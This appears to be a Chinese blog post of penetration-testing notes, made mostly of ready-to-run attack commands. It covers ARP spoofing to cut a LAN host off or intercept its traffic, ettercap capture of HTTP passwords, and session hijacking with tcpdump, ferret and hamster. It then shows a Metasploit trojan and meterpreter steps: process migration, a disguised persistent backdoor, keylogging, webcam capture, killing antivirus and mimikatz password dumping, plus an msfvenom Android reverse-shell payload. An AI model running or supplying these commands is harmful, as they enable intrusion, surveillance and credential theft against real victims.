Web安全渗透
1. 局域網(wǎng)斷網(wǎng)攻擊
wins下
ipconfig查看主機(jī)網(wǎng)絡(luò)IP。
在vmware下
ifconfig獲取當(dāng)前虛擬機(jī)網(wǎng)卡,可能是eth0
fping -asg 172.20.12.254/24獲取局域網(wǎng)網(wǎng)關(guān)中的所有主機(jī),網(wǎng)關(guān)為172.20.12.254
arpspoof -i eth0(網(wǎng)卡) -t 192.168.1.10(目標(biāo)主機(jī)的IP) 192.168.1.1(目標(biāo)主機(jī)所在的網(wǎng)關(guān))arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺騙這樣就可以使得Ip為192.168.1.10,網(wǎng)關(guān)為192.168.1.1,無(wú)法連網(wǎng)。
原理:流量劫持
正常上網(wǎng):上網(wǎng)—》網(wǎng)關(guān)—》外網(wǎng)
上網(wǎng)—》劫持機(jī)的網(wǎng)卡(所有的流量都經(jīng)過(guò)我)—》不轉(zhuǎn)發(fā)到外網(wǎng),導(dǎo)致斷網(wǎng)
2. 流量劫持,并轉(zhuǎn)發(fā)到外網(wǎng),這樣可查看所有會(huì)話,中間人攻擊
echo 1 >/proc/sys/net/ipv4/ip_forward #流量轉(zhuǎn)發(fā) arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺騙工具:arpspoof –>流量欺騙
ctrl + shift + t,新打開(kāi)一個(gè)終端,輸入
可以查看圖經(jīng)過(guò)網(wǎng)卡所有的圖片信息,這樣就能查看 IP192.168.1.10所瀏覽的圖片,但其仍然可以上網(wǎng)。
3. http賬號(hào)密碼獲取
首先流量欺騙,
echo 1 >/proc/sys/net/ipv4/ip_forward #流量轉(zhuǎn)發(fā) arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺騙其次,抓包。
ctrl + shift + t,新打開(kāi)一個(gè)終端,輸入
工具:ettercap抓取網(wǎng)絡(luò)當(dāng)中傳送的數(shù)據(jù)包,-T代表文本模式,q代表安靜模式。
這樣就可以捕獲到 IP192.168.1.10登陸到的所有http網(wǎng)頁(yè)下的賬號(hào)和密碼。
4.局域網(wǎng)內(nèi)Session會(huì)話劫持
Session,通俗的講,瀏覽器 打開(kāi)–》關(guān)閉這個(gè)期間是一個(gè)會(huì)話。
在同一個(gè)局域網(wǎng)當(dāng)中,登錄別人的百度貼吧等。
首先,流量轉(zhuǎn)發(fā),流量欺騙
echo 1 >/proc/sys/net/ipv4/ip_forward #流量轉(zhuǎn)發(fā) arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺騙其次,捕獲數(shù)據(jù)
ctrl + shift + t,新打開(kāi)一個(gè)終端,輸入
tcpdump -i eth0 -w test.cap用來(lái)捕獲數(shù)據(jù)。w寫(xiě)入,tcpdump抓去打到本地的數(shù)據(jù)包。
最后,解析數(shù)據(jù)
ctrl + shift + t,新打開(kāi)一個(gè)終端,輸入
ferret -r test.cap下面需要設(shè)置瀏覽器的代理
Edit—》Preferences—》Advanced—>Network—>Connection—>Settings—>Manual proxy configuration
接著進(jìn)入下一步,模擬受害者登陸
ctrl + shift + t,新打開(kāi)一個(gè)終端,輸入
再接著進(jìn)入瀏覽器,輸入 127.0.0.1:1234
就可以看到所有的cookies
點(diǎn)擊cookies就可以模擬受害者登陸。
工具:用到的工具是arpspoof tcpdump ferret hamster。
arpspoof 進(jìn)行ARP欺騙 tcpdump抓去打到本地的數(shù)據(jù)包 Ferret用來(lái)處理抓下來(lái)的數(shù)據(jù)包的 Hamster跟ferret配合使用,提供一個(gè)web服務(wù)來(lái)讓我們交互控制。整個(gè)流程可見(jiàn)
開(kāi)始arp欺騙 命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100 捕獲數(shù)據(jù)包 命令:tcpdump -i eth0 -w cookie.cap 模擬受害者登錄 受害者在受害機(jī)器上就隨便刷新一下或者登錄一下 完畢下面我們開(kāi)始重點(diǎn) 處理抓去的數(shù)據(jù)包ferret -r cookie.cap 自動(dòng)生成了 hamster.txt 記得設(shè)置瀏覽器代理: 開(kāi)啟hamster服務(wù) 打開(kāi)hamster 瀏覽器輸入http://127.0.0.1:12345.生成木門(mén)
攻擊端:
OS:Kali
IP:192.168.1.104
被害端:
OS:Windows (64位)
IP:192.168.1.10
metaspolit framework
msf利器!
如何生成木門(mén)
LHOST 為虛擬機(jī)的IP,LPORT為虛擬機(jī)的端口,我們是用虛擬機(jī)作為攻擊機(jī)。
ctrl + shift +t , 重新打開(kāi)一個(gè)端口
輸入
下面開(kāi)始尋找肉機(jī),只要?jiǎng)e人打開(kāi)這個(gè)muma.exe,就會(huì)成功找到。
別人必須打開(kāi)這個(gè) .exe 文件?如何讓別人打開(kāi)?360 直接就能屏蔽?
監(jiān)聽(tīng)鍵盤(pán),輸入的是漢語(yǔ),監(jiān)聽(tīng)輸出的是英文,這是以為監(jiān)聽(tīng)鍵盤(pán)僅僅只是監(jiān)聽(tīng)鍵盤(pán)的輸入字符。
幫助菜單
meterpreter > ?轉(zhuǎn)移 meterpreter到其他進(jìn)程
(轉(zhuǎn)移的目的是為了防止被攻擊人查看進(jìn)程管理器,殺死不明進(jìn)程,一般轉(zhuǎn)移到屏幕桌面進(jìn)程explorer.exe,只要屏幕不關(guān)閉,metersploit進(jìn)程就不關(guān)閉)
將木馬文件test.exe 的進(jìn)程pid遷移到 PID為2044的explorer的進(jìn)程
meterpreter > migrate 2044驗(yàn)證
meterpreter > ps查看可知,test.exe進(jìn)程已經(jīng)沒(méi)有了。需要注意的是如果存在殺軟的話可能會(huì)阻止進(jìn)程注入
安裝后門(mén) metsvc
(安裝后門(mén)的目的是為了進(jìn)行開(kāi)機(jī)自啟動(dòng),修改注冊(cè)表之類的,讓木馬能長(zhǎng)久的存活,一般把木馬test.exe 文件 改成qqconfig.exe之類的偽裝名,肉機(jī)就不敢刪除。)
metsvc后門(mén)安裝成功,接下來(lái)是連接
ctrl + shift +t , 重新打開(kāi)一個(gè)端口
其中 RHOST 為肉機(jī)的IP, 端口設(shè)置為metsvc所創(chuàng)建的端口
查看肉機(jī)的系統(tǒng)
meterpreter > sysinfo獲取作為運(yùn)行服務(wù)器的用戶
getuid盡可能獲取盡可能多的特權(quán)
getprivs獲得系統(tǒng)管理員權(quán)限
getsystem獲取目標(biāo)主機(jī)的圖形界面(VNC)
meterpreter > run vnc查看屏幕
meterpreter > keyscan_start #啟動(dòng)時(shí)與如 Word 或?yàn)g覽器的進(jìn)程相關(guān)聯(lián)的鍵盤(pán)記錄軟件 meterpreter > keyscan_dump #鍵盤(pán)記錄軟件的內(nèi)容轉(zhuǎn)儲(chǔ) meterpreter >keyscan_stop #停止鍵盤(pán)記錄軟件抓去 meterpreter 桌面的屏幕截圖
screenshot控制攝像頭
meterpreter > webcam_stream控制鼠標(biāo)
uictl -啟用用戶界面組件的一些控件
查看當(dāng)前進(jìn)程
ps重新打開(kāi)連接
meterpreter > rerun查看目標(biāo)主機(jī)都采用了那些防護(hù)措施,列出幫助菜單,關(guān)閉防火墻以及其它我們發(fā)現(xiàn)的防護(hù)措施:
meterpreter >run getcountermeasure meterpreter >run getcountermeasuer -h meterpreter >run getcountermeasuer -d -kkillav腳本來(lái)殺死目標(biāo)主機(jī)運(yùn)行的殺毒軟件
meterpreter > run killav識(shí)別被控制的主機(jī)是否是一臺(tái)虛擬機(jī)
meterpreter >run checkvm在一個(gè)meterpreter會(huì)話界面中使用cmd shell
meterpreter >shell獲取密碼
法國(guó)神器mimikatz可以直接獲得操作系統(tǒng)的明文密碼,meterpreter添加了這個(gè)模塊。
首先加載mimikatz模塊。
由于我的Windows 2008是64位的,所以先要轉(zhuǎn)移到64位進(jìn)程。
pid 2780 為64位進(jìn)程 winlogon.exe
meterpreter > load mimikatz獲取密碼哈希
meterpreter > msv獲取明文密碼
meterpreter > kerberos參考主頁(yè)
https://www.91ri.org/8625.html
https://www.91ri.org/9018.html
待學(xué)習(xí)的網(wǎng)頁(yè)
https://www.91ri.org/8879.html
https://www.91ri.org/9548.html
https://www.91ri.org/9560.html
https://www.91ri.org/11060.html
https://www.91ri.org/7170.html
https://www.91ri.org/12488.html
https://www.91ri.org/6843.html
6.滲透安卓 Android
生成木馬
msfvenom -p android/meterpreter/reverse_tcp LHOST=虛擬機(jī)IP LPORT= 55555 R > test.apkctrl + shift + t 打開(kāi)另外一個(gè)終端
msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 虛擬機(jī)IP set LPORT 55555 exploit更多細(xì)節(jié)可查看
http://www.myexception.cn/android/2023190.html
7.繼續(xù)
總結(jié)
- 上一篇: 民生银行值得办的白金卡 盘点民生的“神卡
- 下一篇: 五种方法提高你的智力